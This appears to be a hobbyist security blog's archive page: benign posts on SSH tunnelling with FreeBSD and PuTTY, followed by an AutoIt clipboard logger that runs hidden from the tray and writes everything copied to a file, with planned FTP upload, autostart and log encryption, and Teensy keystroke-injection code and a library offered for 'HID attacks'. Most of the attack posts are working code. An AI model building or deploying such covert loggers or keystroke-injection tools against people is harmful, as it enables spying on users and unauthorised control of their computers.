SSH Tunnelling & Secure Browsing: Part III

ssh -D 8080:localhost

This time I will go over setting up SSH client in Linux, setting up key pairs and how to implement keys for authentication in Linux and in Windows.

Setting up tunnelling in Linux is as easy as typing in:

 

Read More

SSH Tunnelling & Secure Browsing: Part II

If you have completed Part I. You should have a running SSH server ready to tunnel all your needs. If you are on a PC running Microsoft's Windows operating system like me, download PuTTY 0.62-installer.exe from http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.62-installer.exe and install it.PuTTY will be our SSH client and we are going to cover:

  1. Password Authentication
  2. Asymmetric Key based authentication (RSA)

The second method being the most secure if implemented properly. Once Putty is installed it should have created an icon on your desktop. Open Putty and you will see the screen below:

Default PuTTY Screen

Fill up the fields as necessary Host Name: [username]@[server name]|[IP address] Port: The default port is 22 *** Connection type: SSH Saved Sessions: [Any name of your liking]

Once this information is filled in click on "Connection" > expand "SSH" > "Tunnels" and fill the tunnel information.

Tunnel Configuration

Click Add when done. On the menu to the left scroll all the way up and click "Session"and then click "Save" to save changes to the configuration. Click "Open" to launch the connection PuTTY will prompt that the Key is not recognized if this is the first time you are connecting. Click Yes to save the key in registry. I will go over key verification in another post. You will be prompted for your password at this stage. Please type it to complete the process. Once in open your browser of choice change the Proxy settings to SOCKSv5 Server / IP = 127.0.0.1, Port: 8090 and you will be tunneling traffic like 1337.

Part III will cover setting up SSH client in Linux, Public / Private key based encryption  in Linux and Windows. Hope you enjoyed, please comment below.

SSH Tunnelling & Secure Browsing: Part I

Checking your Facebook page from Starbucks? Checked your banking information from the Hotel WiFi? Or are you going to Defcon this year? 

Public internet is not secure and there is a need for secure browsing. There are many ways to achieve this and Obfuscate the traffic for eavesdroppers and protect ourselves against Man In The Middle (MITM) attack. After trying a few different solutions like torProject, Hotspot Shield and a few others like it I decided to set up my own SSH Server so that I can create a secure tunnel between my laptop and the SSH server and use that as a SOCKSv5 proxy. If you are still interested I will try to cover the following topics over the next few days:
  1. Install and configure a SSH Server (FreeBSD 9.0)
  2. Create users.
  3. Secure and harden the server.
  4. Configure SSH client (PuTTY) in windows
  5. Create Public and Private keys for authentication
  6. Set up Password-less login.
I wanted to point out that FreeBSD is really stable and uses very little resources to run and is my server of choice. I have tested the same with Debian 6.0.4 and works just as good. All the steps I am about to show should be easy to replicate on all *NIX type systems. I also wanted to point out that a Virtual Private Server will give you the best performance over hosting the SSH server at home.
Server Specs:

Installation Steps:

  1. Create the Guest Machine Guest VM Configuration
  2. Save and Power On. VM should boot from DVD press Enter to continue.
  3. Play this video for actual installation step

Configuration Steps:

  • Create a new user by typing "adduser" then Enter. P.S. add user to "wheel" group so that user can invoke "SU -"

FreeBSD Account Setup

  •  Login as the newly created user
  • mkdir ~/.ssh
  • chmod 700 .ssh
  • su -
  • Enter root password
  • cp /etc/ssh/sshd_config ~/sshd_config.orig
  • cd /home/n3onli8
  • cp /etc/ssh/sshd_config /home/n3onli8/sshd_config
  • vi sshd_config
  • I configured it to look like:

Protocol 2 HostKey /etc/ssh/ssh_host_rsa_key HostKey /etc/ssh/ssh_host_dsa_key

KeyRegenerationInterval 1h ServerKeyBits 1024 LoginGraceTime 2m PermitRootLogin no #StrictModes yes PubkeyAuthentication yes AuthorizedKeysFile    %h/.ssh/authorized_keys # Change to NO to enable built-in password authentication. PasswordAuthentication yes PermitEmptyPasswords no UsePAM no AllowAgentForwarding yes AllowTcpForwarding yes GatewayPorts yes X11Forwarding yes X11DisplayOffset 10 X11UseLocalhost yes PrintLastLog yes TCPKeepAlive yes PermitTunnel yes # override default of no subsystems Subsystem    sftp    /usr/libexec/sftp-server

  • Quit and Write changes
  • rm /etc/ssh/sshd_config
  • mv /home/n3onli8/sshd_config  /etc/ssh/sshd_config
  • /etc/rc.d/sshd restart
  • exit (exit su)

man ssh for better understanding of sshd_config

Part II will cover setting up putty in MS Windows

Thanks for reading. Comment below

Autoit: Clipboard Logger

This code will create an Executable approximately 300KB that will run on your computer logging clip board data to a text file in  %USERPROFILE%\ClipLog.log
  1. Download Autoit from http://www.autoitscript.com/site/
  2. Open SciTE
  3. Copy the code from below and paste it in SciTE
  4. Save the file and hit F5 to test the script
  5. Browse to %USERPROFILE%
  6. Open ClipLog.log to view logged clip board text.
  7. If it's all good then Ctrl + Break to stop the script
  8. Then Ctrl + F7 to compile the program into a .EXE
Stuff for version 2.0
  • Copy Log to ftp
  • Auto start program on power on.
  • encrypt the data in the log to hide the information.
; Clippy.au3
; n3onli8, 22, 12, 2011
; Version 1.0



#NoTrayIcon
#include <File.au3>
#include <Clipboard.au3>


While 1
$Clippy = _ClipBoard_GetData()
if $Clippy <> "0" Then
if $Clippy <> $txtClipboard Then
_FileWriteLog(@UserProfileDir & "\ClipLog.log",$Clippy)
EndIf
EndIf
$txtClipboard=$Clippy
Sleep(100)
WEnd
Exit

Enjoy, Comment below.

<< iPrank >> Teensy ++

Enjoy Demo of n3onli8.h: http://pastebin.com/7dhjJdfN

#include <n3onli8.h>

void AltF(){
   Keyboard.set_modifier(MODIFIERKEY_ALT);
   Keyboard.send_now();
   Keyboard.set_key1(KEY_F);
   Keyboard.send_now();
   delay(200);
   Keyboard.set_modifier(0);
   Keyboard.set_key1(0);
   Keyboard.send_now();
   delay(200);
}

void setup(){
  Serial.begin(9600);
  delay(2500);
  Minimize();
  delay(200);
  PrintScreen();
  delay(200);
  Menu();
  delay(500);
  Keyboard.print("V");
  delay(200);
  Keyboard.print("D");
  delay(200);
  StartRUN();
  delay(500);
  Keyboard.print("mspaint.exe");
  delay(200);
  Enter();
  delay(350);
  Paste();
  delay(200);
  Save();
  delay(200);
  Keyboard.print("%USERPROFILE%\\h4ck.bmp");
  delay(200);
  Enter();
  delay(500);
  AltF();
  delay(100);
  Keyboard.print("K");
  delay(100);
  Keyboard.print("F");
  delay(100);
  AltF4();
  delay(200);
  Minimize(); //Restoring Windows GUI+D
}

void loop(){
}

n3onli8.h Advanced PHUKD Library Complete

Finally Completed building the n3onli8.h teensy library for HID attacks. I wanna call this version 0.1 since I have big plans for this library. Hope you guys Enjoy:

/*********************n3onli8.h**************************/

#ifndef N3ONLI8_H_INCLUDED
#define N3ONLI8_H_INCLUDED

#include "WProgram.h"

void CtrlAltDel();
void StartRUN();
void Enter();
void PrintScreen();
void Minimize();
void Menu();
void AltF4();
void Paste();
void Save();

#endif
/*******************************************************/
//http://pastebin.com/haVm6smL

/************************n3onli8.cpp**********************/

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_DELETE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1500);
}

void StartRUN()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_R);
    Keyboard.send_now();
    delay(1500);
 
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();  
    Keyboard.set_key1(KEY_BACKSPACE);
    Keyboard.send_now();
    delay(100);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
}

void Enter()
{
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void PrintScreen()
{
Keyboard.set_key1(KEY_PRINTSCREEN);
Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void Minimize()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_D);
    Keyboard.send_now();
    delay(300);

Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Menu()
{
  Mouse.set_buttons(0, 0, 1);
  Mouse.set_buttons(0, 0, 0);
}

void AltF4()
{
    Keyboard.set_modifier(MODIFIERKEY_ALT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_F4);
    Keyboard.send_now();
    delay(200);

Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Paste(){
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_V);
Keyboard.send_now();
delay(200);
Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Save(){
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_S);
Keyboard.send_now();
delay(200);
Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}
/**********************************************************/
//http://pastebin.com/YKPc6pgK

Save the 2 files in a folder called n3onli8.h and copy the folder in your Arduino\Libraries folder.
Remember >> Great Power Great responsibilities...
Cheers !!!

Other people that deserve my gratitude for HID hacking...

I have been researching online for other people who have been working along the lines of using a teensy or a similar HID device as a penetration testing tool. Check out these fellows:
  • Adrian Crenshaw at irongeek.com, has done some amazing work on the teensy platform. Had I been at Defcon 18, I would have known that he started this project back in 2010. Check out this page for information on his research and the Programmable HID USB Keystroke Dongle (PHUKD) Library.
  • Darren Kitchen from Hak5.org has been working on a project he likes to call the USB Rubber Ducky. Check out their forum to find out more.